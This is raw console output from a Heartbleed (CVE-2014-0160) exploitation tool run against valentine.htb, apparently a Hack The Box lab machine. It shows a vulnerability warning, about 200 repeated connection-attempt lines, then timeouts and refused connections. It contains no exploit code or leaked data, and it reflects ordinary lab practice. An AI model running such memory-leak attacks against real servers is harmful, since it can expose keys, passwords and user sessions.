
defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)

##################################################################
Connecting to: valentine.htb:443, 500 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0

WARNING: valentine.htb:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 1 of 500Please wait... connection attempt 2 of 500Please wait... connection attempt 3 of 500Please wait... connection attempt 4 of 500Please wait... connection attempt 5 of 500Please wait... connection attempt 6 of 500Please wait... connection attempt 7 of 500Please wait... connection attempt 8 of 500Please wait... connection attempt 9 of 500Please wait... connection attempt 10 of 500Please wait... connection attempt 11 of 500Please wait... connection attempt 12 of 500Please wait... connection attempt 13 of 500Please wait... connection attempt 14 of 500Please wait... connection attempt 15 of 500Please wait... connection attempt 16 of 500Please wait... connection attempt 17 of 500Please wait... connection attempt 18 of 500Please wait... connection attempt 19 of 500Please wait... connection attempt 20 of 500Please wait... connection attempt 21 of 500Please wait... connection attempt 22 of 500Please wait... connection attempt 23 of 500Please wait... connection attempt 24 of 500Please wait... connection attempt 25 of 500Please wait... connection attempt 26 of 500Please wait... connection attempt 27 of 500Please wait... connection attempt 28 of 500Please wait... connection attempt 29 of 500Please wait... connection attempt 30 of 500Please wait... connection attempt 31 of 500Please wait... connection attempt 32 of 500Please wait... connection attempt 33 of 500Please wait... connection attempt 34 of 500Please wait... connection attempt 35 of 500Please wait... connection attempt 36 of 500Please wait... connection attempt 37 of 500Please wait... connection attempt 38 of 500Please wait... connection attempt 39 of 500Please wait... connection attempt 40 of 500Please wait... connection attempt 41 of 500Please wait... connection attempt 42 of 500Please wait... connection attempt 43 of 500Please wait... connection attempt 44 of 500Please wait... connection attempt 45 of 500Please wait... connection attempt 46 of 500Please wait... connection attempt 47 of 500Please wait... connection attempt 48 of 500Please wait... connection attempt 49 of 500Please wait... connection attempt 50 of 500Please wait... connection attempt 51 of 500Please wait... connection attempt 52 of 500Please wait... connection attempt 53 of 500Please wait... connection attempt 54 of 500Please wait... connection attempt 55 of 500Please wait... connection attempt 56 of 500Please wait... connection attempt 57 of 500Please wait... connection attempt 58 of 500Please wait... connection attempt 59 of 500Please wait... connection attempt 60 of 500Please wait... connection attempt 61 of 500Please wait... connection attempt 62 of 500Please wait... connection attempt 63 of 500Please wait... connection attempt 64 of 500Please wait... connection attempt 65 of 500Please wait... connection attempt 66 of 500Please wait... connection attempt 67 of 500Please wait... connection attempt 68 of 500Please wait... connection attempt 69 of 500Please wait... connection attempt 70 of 500Please wait... connection attempt 71 of 500Please wait... connection attempt 72 of 500Please wait... connection attempt 73 of 500Please wait... connection attempt 74 of 500Please wait... connection attempt 75 of 500Please wait... connection attempt 76 of 500Please wait... connection attempt 77 of 500Please wait... connection attempt 78 of 500Please wait... connection attempt 79 of 500Please wait... connection attempt 80 of 500Please wait... connection attempt 81 of 500Please wait... connection attempt 82 of 500Please wait... connection attempt 83 of 500Please wait... connection attempt 84 of 500Please wait... connection attempt 85 of 500Please wait... connection attempt 86 of 500Please wait... connection attempt 87 of 500Please wait... connection attempt 88 of 500Please wait... connection attempt 89 of 500Please wait... connection attempt 90 of 500Please wait... connection attempt 91 of 500Please wait... connection attempt 92 of 500Please wait... connection attempt 93 of 500Please wait... connection attempt 94 of 500Please wait... connection attempt 95 of 500Please wait... connection attempt 96 of 500Please wait... connection attempt 97 of 500Please wait... connection attempt 98 of 500Please wait... connection attempt 99 of 500Please wait... connection attempt 100 of 500Please wait... connection attempt 101 of 500Please wait... connection attempt 102 of 500Please wait... connection attempt 103 of 500Please wait... connection attempt 104 of 500Please wait... connection attempt 105 of 500Please wait... connection attempt 106 of 500Please wait... connection attempt 107 of 500Please wait... connection attempt 108 of 500Please wait... connection attempt 109 of 500Please wait... connection attempt 110 of 500Please wait... connection attempt 111 of 500Please wait... connection attempt 112 of 500Please wait... connection attempt 113 of 500Please wait... connection attempt 114 of 500Please wait... connection attempt 115 of 500Please wait... connection attempt 116 of 500Please wait... connection attempt 117 of 500Please wait... connection attempt 118 of 500Please wait... connection attempt 119 of 500Please wait... connection attempt 120 of 500Please wait... connection attempt 121 of 500Please wait... connection attempt 122 of 500Please wait... connection attempt 123 of 500Please wait... connection attempt 124 of 500Please wait... connection attempt 125 of 500Please wait... connection attempt 126 of 500Please wait... connection attempt 127 of 500Please wait... connection attempt 128 of 500Please wait... connection attempt 129 of 500Please wait... connection attempt 130 of 500Please wait... connection attempt 131 of 500Please wait... connection attempt 132 of 500Please wait... connection attempt 133 of 500Please wait... connection attempt 134 of 500Please wait... connection attempt 135 of 500Please wait... connection attempt 136 of 500Please wait... connection attempt 137 of 500Please wait... connection attempt 138 of 500Please wait... connection attempt 139 of 500Please wait... connection attempt 140 of 500Please wait... connection attempt 141 of 500Please wait... connection attempt 142 of 500Please wait... connection attempt 143 of 500Please wait... connection attempt 144 of 500Please wait... connection attempt 145 of 500Please wait... connection attempt 146 of 500Please wait... connection attempt 147 of 500Please wait... connection attempt 148 of 500Please wait... connection attempt 149 of 500Please wait... connection attempt 150 of 500Please wait... connection attempt 151 of 500Please wait... connection attempt 152 of 500Please wait... connection attempt 153 of 500Please wait... connection attempt 154 of 500Please wait... connection attempt 155 of 500Please wait... connection attempt 156 of 500Please wait... connection attempt 157 of 500Please wait... connection attempt 158 of 500Please wait... connection attempt 159 of 500Please wait... connection attempt 160 of 500Please wait... connection attempt 161 of 500Please wait... connection attempt 162 of 500Please wait... connection attempt 163 of 500Please wait... connection attempt 164 of 500Please wait... connection attempt 165 of 500Please wait... connection attempt 166 of 500Please wait... connection attempt 167 of 500Please wait... connection attempt 168 of 500Please wait... connection attempt 169 of 500Please wait... connection attempt 170 of 500Please wait... connection attempt 171 of 500Please wait... connection attempt 172 of 500Please wait... connection attempt 173 of 500Please wait... connection attempt 174 of 500Please wait... connection attempt 175 of 500Please wait... connection attempt 176 of 500Please wait... connection attempt 177 of 500Please wait... connection attempt 178 of 500Please wait... connection attempt 179 of 500Please wait... connection attempt 180 of 500Please wait... connection attempt 181 of 500Please wait... connection attempt 182 of 500Please wait... connection attempt 183 of 500Please wait... connection attempt 184 of 500Please wait... connection attempt 185 of 500Please wait... connection attempt 186 of 500Please wait... connection attempt 187 of 500Please wait... connection attempt 188 of 500Please wait... connection attempt 189 of 500Please wait... connection attempt 190 of 500Please wait... connection attempt 191 of 500Please wait... connection attempt 192 of 500Please wait... connection attempt 193 of 500Please wait... connection attempt 194 of 500Please wait... connection attempt 195 of 500Please wait... connection attempt 196 of 500Please wait... connection attempt 197 of 500Please wait... connection attempt 198 of 500Please wait... connection attempt 199 of 500
Error Receiving Record! timed out
No heartbeat response received, server likely not vulnerable
Please wait... connection attempt 200 of 500Connection Error! [Errno 113] No route to host
Connection Error! [Errno 111] Connection refused
Connection Error! [Errno 111] Connection refused
Connection Error! [Errno 111] Connection refused
Connection Error! [Errno 111] Connection refused
Connection Error! [Errno 111] Connection refused
Connection Error! [Errno 111] Connection refused
Connection Error! [Errno 111] Connection refused
Connection Error! [Errno 111] Connection refused
Connection Error! [Errno 111] Connection refused
Connection Error! [Errno 111] Connection refused
Connection Error! [Errno 111] Connection refused
Connection Error! [Errno 111] Connection refused
Connection Error! [Errno 111] Connection refused
